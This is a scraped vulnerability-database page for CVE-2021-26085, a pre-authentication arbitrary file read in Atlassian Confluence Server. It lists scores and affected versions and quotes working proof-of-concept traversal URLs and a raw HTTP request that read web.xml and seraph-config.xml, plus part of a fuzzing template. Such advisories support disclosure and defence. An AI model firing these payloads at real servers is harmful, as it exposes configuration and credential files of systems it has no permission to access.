5
CVSSv2

CVE-2021-26085

Published: 03/08/2021 Updated: 05/10/2021
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 5.3 | Impact Score: 1.4 | Exploitability Score: 3.9
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Affected versions of Atlassian Confluence Server allow remote malicious users to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 prior to 7.12.3.

Most Upvoted Vulmon Research Post

POCs for Atlassian Confluence Server Arbitrary File Read: 1) http://127.0.0.1/s/123cfx/_/;/WEB-INF/web.xml 2) http://127.0.0.1/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml 3) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties 4) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml https://github.com/ColdFusionX/CVE-2021-26085

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

atlassian confluence

Mailing Lists

Atlassian Confluence Server version 751 suffers from a pre-authorization arbitrary file read vulnerability ...

Github Repositories

CVE-2021-26085 Atlassian Confluence Server 751 Pre-Authorization Arbitrary File Read vulnerability POC #1 - webxml GET /s/123cfx/_/;/WEB-INF/webxml HTTP/11 Host: 127001:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64) AppleWebKit/53736 (KHTML, like Gecko) Chrome/940460661 Safari/53736 Accept: text/html

CVE-2021-26085 Ideas from: githubcom/ColdFusionX/CVE-2021-26085 Modifications from: my burp twittercom/zeroc00I DISCLAIMER: List domains should end by "/" confluence-CVE-2021-26085yaml id: confluence-lfi-fuzz info: name: confluence-lfi-zeroc00I author: zeroc00I severity: high reference: lfi tags: lfi attack: clusterbomb requests: - p

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-